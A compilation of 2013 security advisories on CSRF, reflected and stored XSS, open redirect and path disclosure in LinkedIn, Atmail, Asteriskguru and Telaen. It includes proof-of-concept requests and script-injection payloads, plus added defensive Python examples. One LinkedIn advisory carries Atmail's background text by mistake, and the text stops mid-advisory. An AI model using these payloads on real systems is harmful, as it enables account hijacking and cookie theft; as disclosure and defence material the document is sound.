Advisories 2013

2013-001: CSRF vulnerability in LinkedIn.

2013-002: Reflected XSS in Asteriskguru Queue Statistics.

2013-003: XSS vulnerability in LinkedIn.

2013-004: Reflected XSS in the view attachment message process of the Atmail WebMail <= v7.0.2.

2013-005: LinkedIn social network is affected by Persistent Cross-Site Scripting vulnerability.

2013-006: Multiple Reflected XSS vulnerabilities in LinkedIn Investors.

2013-009: Multiple Vulnerabilities in Telaen <= 1.3.0.

2013-011: HTTP Response Splitting Vulnerability in WebCollab <= v3.30

2013-012: Multiple Full Path Disclosure Vulnerabilities in TinyWebGallery <= v1.8.9

2013-014: Multiple reflected XSS vulnerabilities in Atmail WebMail.

2013-016: CSRF vulnerability in LinkedIn

2013-017: SQL Injection vulnerability in "Project'Or RIA" allow arbitrary access to the database and the file system.

2013-018: Multiple XSS vulnerabilities in "Project'Or RIA".

2013-001: CSRF vulnerability in LinkedIn

Original release date: January 30th, 2013
Last revised: March 25th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Score)

BACKGROUND

LinkedIn is a social networking service and website (www.linkedin.com) for professionals. The site officially launched on May 5, 2003. As of September 30, 2012 (the end of the third quarter), professionals are signing up to join LinkedIn at a rate of approximately two new members per second. Currently, over 175 million professionals use LinkedIn to exchange information, ideas and opportunities.

DESCRIPTION

CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help from social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operations in the case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

More info about CSRF:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
LinkedIn is vulnerable to CSRF attacks in the "Add connections" functionality, specifically in the "Send Invitation" request. The only token used to authenticate the user is the session cookie, and this cookie is sent automatically by the browser in every request.
An attacker can create a page that includes requests to the "Send Invitation" functionality of LinkedIn and thereby add to his connections any authenticated users who visit the attacker's page.
The attack is made easier because the "Send Invitation" request can be made with the HTTP GET method instead of the POST method that the "Send Invitation" form normally uses.
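
As an added illustration (this is not code from the advisory or from LinkedIn), the following Python sketch shows the server-side checks whose absence the description above relies on: a state-changing endpoint that refuses GET, requires a CSRF token, and verifies that the token is bound to the session cookie. The endpoint shape, the session cookie name and the server secret are assumptions made for the example.

```python
import hashlib
import hmac

# Constructed server-side secret for the example; a deployment loads its own
# from configuration and never embeds it in source.
SERVER_SECRET = b"example-secret-not-for-production"

# Hypothetical name of the session cookie (assumption for this example).
SESSION_COOKIE = "session"


def csrf_token_for_session(session_id: str) -> str:
    """Derive the CSRF token for a session as an HMAC of the session id.

    Binding the token to the session means a token obtained in one session
    (for instance the attacker's own) is not valid for another.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_send_invitation(method: str, cookies: dict, params: dict) -> tuple:
    """Hardened stand-in for a state-changing "send invitation" endpoint.

    Returns (status, message). The three checks are the ones the advisory
    finds missing: GET is refused, the token is mandatory, and it must match
    the token derived from the session cookie.
    """
    # 1. State changes only over POST. An <img src=...> on a third-party
    #    page can only issue GET, so the forged request stops here.
    if method != "POST":
        return 405, "method not allowed: use POST"

    session_id = cookies.get(SESSION_COOKIE)
    if not session_id:
        return 401, "not authenticated"

    # 2. The token is required; a request without it is rejected rather
    #    than silently processed.
    token = params.get("csrfToken")
    if not token:
        return 403, "missing csrfToken"

    # 3. Constant-time comparison against the token bound to this session.
    if not hmac.compare_digest(token, csrf_token_for_session(session_id)):
        return 403, "csrfToken does not match session"

    return 200, "invitation sent to " + params.get("emailAddresses", "")
```

A cross-site form POST still carries the victim's cookie, so the method check alone is not enough; the session-bound token is what makes a forged request distinguishable from a legitimate one.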

PROOF OF CONCEPT

Next, we show a typical request to the "Send Invitation" functionality:

POST /fetch/manual-invite-create HTTP/1.1
Host: www.linkedin.com
...

emailAddresses=<email>&subject=Invitation+to+connect+on+LinkedIn&csrfToken=ajax:1234567890123456789&sourceAlias=0_cB6j7zv7bfEcbTWXQyKwqELvCi7FWQRq-jJsq2WDImH

Some parameters are not used/validated by the application, so we can remove these parameters from the request:
- csrfToken
- sourceAlias

Also, we can use the HTTP GET method instead of the HTTP POST method used in this request, which makes exploitation of the CSRF vulnerability easier. So, finally, this HTTP request produces the same result as the original HTTP POST request:

GET /fetch/manual-invite-create?emailAddresses=<email>&subject=Invitation+to+connect+on+LinkedIn

1. An attacker creates a web page "csrf-exploit.html" that makes an HTTP GET request to the "Send Invitation" functionality.
For example:

...

<img src="http://www.linkedin.com/fetch/manual-invite-create?emailAddresses=&subject=" width=0 height=0>

...

2. A user authenticated in LinkedIn visits the "csrf-exploit.html" page controlled by the attacker.
For example, the attacker sends a message to the victim (through the messaging system provided by LinkedIn, which is better as it ensures that the victim user is authenticated) and induces the victim to visit his page (using social engineering techniques).
3. The attacker receives an invitation request from the victim user, so the attacker just accepts this invitation and the user is added to his connections/contacts.

BUSINESS IMPACT

A malicious user can access the information shared by users who have been added to his contacts without their consent or knowledge.

SYSTEMS AFFECTED

LinkedIn service.

SOLUTION

Corrected by vendor.

REFERENCES

http://www.linkedin.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

January 16, 2013: Initial release
March 30, 2013: New update

DISCLOSURE TIMELINE

January 16, 2013: Vulnerability acquired by Internet Security Auditors.
March 10, 2013: Sent to Sec Team.
March 15, 2013: Notification about correction.
March 25, 2013: Sent to lists.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain-based leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, open security project collaboration and whitepapers, and participation in and promotion of presentations and security events. For further information regarding our security services, contact us.


2013-002: Reflected XSS in Asteriskguru Queue Statistics.

Original release date: January 22nd, 2013
Last revised: March 10th, 2013
Discovered by: Manuel Garcia Cardenas
Severity: 4.8/10 (CVSS Base Score)

BACKGROUND

Asteriskguru Queue Statistics is a PHP-based program which gives anyone who uses queues or CDRs in Asterisk a deep insight into the quality of the service delivered to their customers. It is fully developed by the Asteriskguru developers.

DESCRIPTION

A reflected XSS vulnerability has been detected in Asteriskguru Queue Statistics that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.
The code injection is done through the "warning" parameter of the error.php page.

PROOF OF CONCEPT

Malicious Request:

http://vulnerablesite.com/public/error.php?warning=< xss injection >

Example:

http://vulnerablesite.com/public/error.php?warning=< script >alert("XSS")< /script >

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, which can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

All Versions of Asteriskguru Queue Statistics.

SOLUTION

All data received by the application that can be modified by the user must be validated before any kind of transaction is performed with it.
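
As an added example of that validation (this is not the Asteriskguru code, and the warning codes are constructed for the illustration), the Python below renders the error page so that the "warning" parameter is either mapped to a fixed message through an allow-list or encoded for HTML output. The payload from the proof of concept is then displayed as text instead of being parsed by the browser.

```python
import html

# Constructed allow-list of warning codes this error page knows how to show.
KNOWN_WARNINGS = {
    "nodata": "No queue data was found for the selected period.",
    "login": "Please log in to view the queue statistics.",
}


def escape_for_html_body(value: str) -> str:
    """Encode a string for inclusion in HTML text content or a quoted attribute."""
    return html.escape(value, quote=True)


def render_error_page(warning: str) -> str:
    """Render the error page with the "warning" parameter handled safely.

    A known code is mapped to a fixed message, so the page normally never
    echoes user-supplied text at all. Anything else is emitted only through
    the encoder, so markup in the parameter is displayed, not parsed.
    """
    message = KNOWN_WARNINGS.get(warning)
    if message is None:
        message = "Unknown warning: " + escape_for_html_body(warning)
    return '<html><body><p class="warning">' + message + "</p></body></html>"
```

The allow-list is the stronger of the two measures: when every legitimate value of the parameter is a known code, free-form text never needs to reach the page, and the encoder only covers the unexpected case.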

REFERENCES

www.asteriskguru.com/tools/queue_stats.php
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Manuel Garcia Cardenas (mgarcia (at) isecauditors (dot) com).

REVISION HISTORY

January 22, 2013: Initial release

DISCLOSURE TIMELINE

January 22, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
January - February: Attempts to contact someone managing the project without answer.
March 10, 2013: Send to lists.


2013-003: XSS vulnerability in LinkedIn.

Original release date: March 3rd, 2013
Last revised: March 10th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Score)

BACKGROUND

LinkedIn is a social networking service and website (www.linkedin.com) for professionals. The site officially launched on May 5, 2003. As of September 30, 2012 (the end of the third quarter), professionals are signing up to join LinkedIn at a rate of approximately two new members per second.
Currently, over 200 million professionals use LinkedIn to exchange information, ideas and opportunities.
More info: http://www.linkedin.com

DESCRIPTION

Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.

LinkedIn is vulnerable to XSS attacks during a DWR (Direct Web Remoting, a Java open source library) call through the "c0-id" parameter.
There are several instances of this issue:
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreativeText.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getBidSuggestion.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateClickThroughUrl.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getCostAndMemberCount.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateRequiredFields.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateDisplayUrl.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getExampleAds.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.changeBizAcctName.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.updateAlertMessageId.dwr

PROOF OF CONCEPT

Next, we show a typical request to the "/ads/dwr/exec/SasAjax.validateCreative.dwr" resource:

    POST /ads/dwr/exec/SasAjax.validateCreative.dwr HTTP/1.1
    Host: www.linkedin.com
    ......

    callCount=1
    JSESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9
    c0-scriptName=SasAjax
    c0-methodName=validateCreative
    c0-id=5518_1360723319833
    c0-param0=string:
    c0-param1=string:
    c0-param2=string:
    c0-param3=string:
    c0-param4=string:
    c0-param5=string:
    c0-param6=string:en_US
    c0-param7=string:0
    c0-param8=string:0
    c0-param9=number:0
    xml=true

Some parameters are not used/validated by the application, so we can remove them from the request. The only parameters that are required by the application are:

- callCount
- JSESSIONID <== can have any value, but must match the JSESSIONID cookie
- c0-id <== vulnerable parameter (we can inject HTML/script code through this parameter)
- xml <== we need to change the value from "true" (default value) to "false" to make the script code injection possible

Also, we can use the HTTP GET method instead of the HTTP POST method used in this request. This makes exploitation of the XSS vulnerability easier. For example, we can inject script code to show an alert popup with the "document.cookie" value:

c0-id=5518_1360723319833');</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><!--

So, finally, this HTTP request produces the XSS exploitation:

https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr?callCount=1&SESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9&c0-id=5578_1362323397833');</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><!--&xml=false 
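
The breakout above works because the c0-id value is written into a script block as a JavaScript string literal: a single quote and parenthesis close the literal and the call, and a literal </SCRIPT> ends the element for the HTML parser, which knows nothing about JavaScript quoting. As an added example (not DWR's or LinkedIn's code; the reply layout and the callback name are assumptions), the Python encoder below emits user data into a script context with JSON encoding plus \u escapes for the characters the HTML parser cares about, and a check confirms the script block stays intact with the proof-of-concept value.

```python
import json


def js_string_literal(value: str) -> str:
    """Encode a value as a JavaScript string literal safe inside <script>.

    json.dumps escapes quotes, backslashes and control characters (so the
    ') breakout fails) and, with the default ensure_ascii=True, also the
    U+2028/2029 line terminators. The HTML parser does not understand JS
    quoting, so "<", ">" and "&" are further replaced by \\u escapes; the
    page then contains no "</script>" or "<!--" originating from user data.
    """
    encoded = json.dumps(value)
    return encoded.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def dwr_style_reply(call_id: str, result: str) -> str:
    """Constructed stand-in for a reply page that echoes the call id into a
    script callback (hypothetical layout and function name, not DWR's own)."""
    return (
        "<html><script>handleCallback("
        + js_string_literal(call_id) + ", " + js_string_literal(result)
        + ");</script></html>"
    )


def script_block_intact(page: str) -> bool:
    """True if the page still has exactly one script element: one opening
    tag, one closing tag, and no other angle brackets than the four that
    belong to the fixed template."""
    low = page.lower()
    return low.count("<script") == 1 and low.count("</script") == 1 and page.count("<") == 4
```

The same rule applies to any value placed inside a script element, including JSON blobs embedded for the client: encode for the JavaScript context and additionally neutralise the three characters the HTML tokenizer reacts to.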

BUSINESS IMPACT

A malicious user can access the information stored in other users' cookies, so the attacker can spoof their identity and access their accounts.

SYSTEMS AFFECTED

http://www.linkedin.com

SOLUTION

Pending.

REFERENCES

http://www.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

CREDITS

This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

March 3, 2013: Initial release

DISCLOSURE TIMELINE

March 3, 2013: Vulnerability acquired by Internet Security Auditors.
March 11, 2013: Sent to Sec Team.
July 4, 2013: Initial vendor notification sent.
July 9, 2013: No update yet.
July 11, 2013: All issues reported should be resolved.


2013-004: Reflected XSS in the view attachment message process of the Atmail WebMail <= v7.0.2

Original release date: March 9th, 2013
Last revised: March 25th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Score)
CVE-ID: CVE-2013-2585

BACKGROUND

Atmail allows users to access IMAP Mailboxes of any server of your choice. The software provides a comprehensive email-suite for accessing user mailboxes, and provides an inbuilt Calendar and Addressbook features. The WebMail Client of Atmail supports any existing IMAP server running under Unix/Linux or Windows systems.

DESCRIPTION

A reflected XSS vulnerability has been detected in the view attachment message process of Atmail WebMail that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.
The code injection is done through the file name parameter, and requires that the victim user is authenticated in the WebMail.

PROOF OF CONCEPT

When a user opens a file attachment in an email, the link is as follows:

http://<atmail-server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/<file>

where:
- <atmail-server> is the Atmail WebMail server
- <ID> is the unique ID for the message that contains the attachment
- <file> is the attachment file name in the message
A malicious user can inject arbitrary HTML/script code in the <file> (filenameOriginal) parameter. For example:

http://<atmail-server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/test.txt<H1><marquee>This+is+an+XSS+example

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, which can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

Tested in Atmail 7.0.2. Other versions may be affected too.

SOLUTION

Update to version 7.0.3.

REFERENCES

http://www.atmail.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

March 9, 2013: Initial release

DISCLOSURE TIMELINE

March 9, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 10, 2013: Contacts to Atmail without response.
March 19, 2013: Second attempt: Twitting. Third: Facebooking. Let's get Social!
March 21, 2013: Response and sent to Security Team.
March 25, 2013: Version 7.0.3 published.


2013-005: LinkedIn social network is affected by Persistent Cross-Site Scripting vulnerability.

Original release date: 3rd March 2013
Last revised: 10th March 2013
Discovered by: Eduardo Garcia Melia
Severity: 5.2/10 (CVSS Base Score)

BACKGROUND

Atmail allows users to access IMAP Mailboxes of any server of your choice. The software provides a comprehensive email-suite for accessing user mailboxes, and provides an inbuilt Calendar and Addressbook features. The WebMail Client of Atmail supports any existing IMAP server running under Unix/Linux or Windows systems.

DESCRIPTION

LinkedIn social network is affected by Persistent Cross-Site Scripting vulnerability. The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. The affected resource is http://www.linkedin.com/people/connections when you create new tags.
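
As an added example (not LinkedIn's code; the character policy and the length limit are constructed for the illustration), the Python below validates a tag name against an allow-list at creation time, so the tag values listed in the proof of concept below are refused before they are ever stored, instead of trying to strip "dangerous" substrings. Output-time encoding is still required wherever stored names are rendered, since validation at input is only the first layer.

```python
import re
import unicodedata

# Constructed policy for this example: a tag starts with a letter or digit
# and may contain letters, digits, spaces and a few punctuation marks, up to
# 50 characters. Everything else, markup included, is rejected.
TAG_NAME_RE = re.compile(r"[^\W_][\w .,'&-]{0,49}")


class InvalidTagName(ValueError):
    """Raised when a user-supplied tag name fails the allow-list check."""


def validate_tag_name(raw: str) -> str:
    """Normalise and validate a tag name at creation time; return the
    canonical form or raise InvalidTagName.

    Allow-listing what a tag may look like is more robust than trying to
    remove dangerous substrings, which attackers route around with
    alternative encodings and tag variants.
    """
    name = unicodedata.normalize("NFC", raw).strip()
    if not TAG_NAME_RE.fullmatch(name):
        raise InvalidTagName("tag name not allowed: %r" % raw)
    return name


def is_valid_tag_name(raw: str) -> bool:
    """Boolean wrapper around validate_tag_name for callers that only need a verdict."""
    try:
        validate_tag_name(raw)
        return True
    except InvalidTagName:
        return False
```

Unicode normalisation before the check matters because two visually identical names can have different code point sequences; normalising first keeps the stored value canonical and prevents the same tag from being created twice in different forms.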

PROOF OF CONCEPT

=========================
First Option
=========================
You can go to LinkedIn Contacts -> Connections -> Manage. Then, in the "Add New Tag" field, you can enter these tags, for example:

    + <IFRAME SRC=# onmouseover="alert('XSS')">
    + <IMG SRC=# onmouseover="alert('XSS')">
    + <IMG onmouseover="alert('XSS')">

Finally, press the "Add New Tag" button and the injection is displayed.
=========================
Second Option
=========================
You can go to LinkedIn Contacts -> Connections -> All Connections and then select one contact.

Then, in the right panel, there is a "Tags:" label; press "Edit tags". You can then enter these tags, for example:

    + <IFRAME SRC=# onmouseover="alert('XSS')">
    + <IMG onmouseover="alert('XSS')">

Finally, press the "+" button and the injection is displayed.
=========================
REQUESTS
=========================
First, create <IFRAME SRC=# onmouseover="alert('XSS')">  Tag:

REQUEST 1:

    POST /people/create-tag?csrfToken=TOKEN_CSRF HTTP/1.1
    Host: www.linkedin.com
    Origin: http://www.linkedin.com
    X-Requested-With: XMLHttpRequest
    X-IsAJAXForm: 1
    Cookie: XXXX

    &tagContext=undefined&tagName=%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert('XSS')%22%3E

RESPONSE 1:

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    Content-Type: application/json;charset=UTF-8
    Content-Language: en-US
    Date: Sun, 03 Mar 2013 16:49:14 GMT
    X-FS-TXN-ID: 2b654458ea50
    X-FS-UUID: e0463ca154f7e712703c4a69cb2a0000
    X-LI-UUID: 4EY8oVT35xJwPEppyyoAAA==
    Age: 1
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0

    {"content":"113275897","status":"ok"}

Second, make the request that displays the tag names:

REQUEST 2:

    POST /people/fetch-tags?csrfToken=ajax%3A7023500174643473361 HTTP/1.1
    Host: www.linkedin.com
    Origin: http://www.linkedin.com
    X-Requested-With: XMLHttpRequest
    User-Agent: MSIE 9.0
    X-IsAJAXForm: 1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Accept: */*
    Referer: http://www.linkedin.com/people/connections
    Cookie: XXX

    &tagContext=conn_detail_panel&memIds=M-220814631

The request also works without the csrfToken, because the application does not verify that the csrfToken value matches the session cookie.

RESPONSE:

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    Content-Type: application/json;charset=UTF-8
    Date: Sun, 03 Mar 2013 16:50:37 GMT
    X-FS-TXN-ID: 2b8fc977b850
    X-FS-UUID: a0d6d9c867f7e712d0ff6b10ed2a0000
    X-LI-UUID: oNbZyGf35xLQ/2sQ7SoAAA==
    Age: 0
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0

    {"content":"[\"{\\\"id\\\":\\\"104055107\\\",\\\"name\\\":\\\"<IFRAME SRC=# onmouseover=\\\\\\\"alert('XSS')\\\\\\\">\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\\"104044777\\\",\\\"name\\\":\\\"classmates\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\\"104044787\\\",\\\"name\\\":\\\"colleagues\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\\"104044767\\\",\\\"name\\\":\\\"friends\\\",\\\"bucket\\\":\\\"tagsAllHave\\\"}\",\"{\\\"id\\\":\\\"104044797\\\",\\\"name\\\":\\\"group members\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\\"104044807\\\",\\\"name\\\":\\\"partners\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\"]","status":"ok"}

BUSINESS IMPACT

A malicious user who finds a way to exploit this vulnerability could make other users perform actions of the attacker's choosing in the application, from adding the attacker to their network to deleting their profile, because the CSRF token is useless: it is not checked against the user's session.

SYSTEMS AFFECTED

The vulnerability affects the LinkedIn network:
http://www.linkedin.com
https://touch.www.linkedin.com

SOLUTION

LinkedIn applied a new contact management system.

REFERENCES

http://www.linkedin.com
http://www.isecauditors.com
http://en.wikipedia.org/wiki/Cross-site_scripting#Persistent

CREDITS

These vulnerabilities have been discovered by Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

REVISION HISTORY

March 03, 2013: Initial release

DISCLOSURE TIMELINE

March 03, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 10, 2013: Send to Sec Team.
July 4, 2013: Initial vendor notification sent
July 9, 2013: Vendor implemented a fix
November 11, 2013: Disclosure


2013-006: Multiple Reflected XSS vulnerabilities in LinkedIn Investors.

Original release date: 4th March 2013
Last revised: 25th March 2013
Discovered by: Eduardo Garcia Melia
Severity: 4.3/10 (CVSS Base Scored)

BACKGROUND

LinkedIn is a social networking service and website (http://www.linkedin.com/) that operates the world's largest professional network on the Internet, with more than 187 million members in over 200 countries and territories.
More Information: http://press.linkedin.com/about

DESCRIPTION

LinkedIn Investors is affected by multiple reflected Cross-Site Scripting vulnerabilities. An attacker can inject HTML or script code in the context of the victim's browser, and so can perform XSS attacks and steal the cookies of a targeted user. The affected resource is http://investors.linkedin.com.

PROOF OF CONCEPT

The XSS vulnerability is in the User-Agent header:

===============
First XSS
===============
	GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Cache-Control: max-age=0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2
===============
Second XSS
===============
	GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2
===============
Third XSS
===============	
	GET /stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'-- HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Referer: http://investors.linkedin.com/stocklookup.cfm
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2
===============
Fourth XSS
===============	
	GET /calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Referer: http://investors.linkedin.com/calculator.cfm
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2

RESPONSE in all cases:

	HTTP/1.1 500 Internal Server Error
	Connection: close
	Date: Mon, 04 Mar 2013 11:34:48 GMT
	Server: Microsoft-IIS/6.0
	X-Powered-By: ASP.NET
	server-error: true
	Content-Type: text/html; charset=UTF-8

	Error occurred processing request

	Error Diagnostic

	<cfoutput> Element RESULT.TITLE is undefined in RELEASEDETAIL.
	The error occurred on line 175. Date/Time: Mon Mar 04 06:34:48 EST 2013
	Browser: <script>alert("XSS")</script>
	Remote Address: 192.168.149.88

	</cfoutput>

BUSINESS IMPACT

This flaw can be used by a malicious user to send phishing messages to LinkedIn customers, abusing the users' trust in the LinkedIn portal to trick them. The user can be forwarded to a LinkedIn clone site that steals credentials, to a malicious site hosting malware, and more.

SYSTEMS AFFECTED

The vulnerability affects the LinkedIn Investors: http://investors.linkedin.com

SOLUTION

Corrected by vendor.

REFERENCES

http://investors.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)

CREDITS

These vulnerabilities have been discovered by Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

REVISION HISTORY

March 04, 2013: Initial release
March 10, 2013: Second release

DISCLOSURE TIMELINE

March 04, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 10, 2013: Sent to Sec Team.
March 25, 2013: Request for update. Response regarding it was already corrected. Sent to lists.


2013-009: Multiple Vulnerabilities in Telaen <= 1.3.0

Original release date: March 15th, 2013
Last revised: June 4th, 2013
Discovered by: Manuel Garcia Cardenas
Severity: 4.8/10 (CVSS Base Score)
CVE-ID: CVE-2013-2621, CVE-2013-2623, CVE-2013-2624

BACKGROUND

Telaen is a webmail reader application supporting both IMAP and POP3 protocols. It can be installed without dependence of any PHP's extra modules or a separate database. It is Open source software published under GNU General Public License (GPL).
The latest version of Telaen is 1.3.0, released in January 2012.

DESCRIPTION

Telaen 1.3.0 and lower versions contain a flaw that allows a remote redirection attack. This flaw exists because the application does not properly sanitise the input to the file "redir.php". This allows an attacker to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choice.
Additionally, a reflected XSS vulnerability has been detected in Telaen 1.3.0 and lower versions that allows arbitrary HTML/JavaScript code to be executed in the context of the victim user's browser. The code injection is done through the "f_email" parameter of the index.php page.
The error messages produced by Telaen 1.3.0 and lower versions reveal the full installation path of the web application.
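
As an added example for the redirection issue (not Telaen's code; the allowed host and the default target are constructed for the illustration), the Python function below validates a redirect target against an allow-list of hosts. It handles the absolute-URL, protocol-relative, backslash, userinfo and non-HTTP-scheme cases that a naive "starts with a slash" check misses, and falls back to a fixed local page for anything it cannot accept.

```python
from urllib.parse import urlsplit

# Constructed allow-list: the hosts this webmail installation may send users to.
ALLOWED_HOSTS = {"webmail.example.com"}
# Where to go when the requested target is not acceptable (constructed path).
DEFAULT_TARGET = "/telaen/index.php"


def safe_redirect_target(raw: str) -> str:
    """Return a redirect target confined to this site, or DEFAULT_TARGET.

    Covers the cases a naive "starts with /" check misses: absolute URLs to
    other hosts, protocol-relative "//host", backslashes that browsers
    treat as slashes, userinfo tricks ("host@evil") and non-HTTP schemes.
    """
    if not raw:
        return DEFAULT_TARGET
    candidate = raw.strip().replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:  # malformed input, e.g. an unterminated IPv6 literal
        return DEFAULT_TARGET

    # Reject javascript:, data: and any other non-web scheme outright.
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return DEFAULT_TARGET

    if parts.netloc:
        # Absolute or protocol-relative URL: the host must be allow-listed.
        host = (parts.hostname or "").lower()
        return candidate if host in ALLOWED_HOSTS else DEFAULT_TARGET

    # No host: accept only a site-relative path with a single leading slash.
    if candidate.startswith("/") and not candidate.startswith("//"):
        return candidate
    return DEFAULT_TARGET
```

Where the application only ever needs to return to a handful of its own pages, an even simpler design is to accept a short key (such as "inbox") and look the real path up server-side, so that no URL is taken from the request at all.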

PROOF OF CONCEPT

REDIRECT: http://vulnerablesite.com/telaen/redir.php?http://www.malicious-site.com

XSS: http://vulnerablesite.com/telaen/index.php?tid=default&lid=en_UK&f_email="><script>alert("XSS")</script>

FULL PATH DISCLOSURE: http://vulnerablesite.com/telaen/inc/init.php

BUSINESS IMPACT

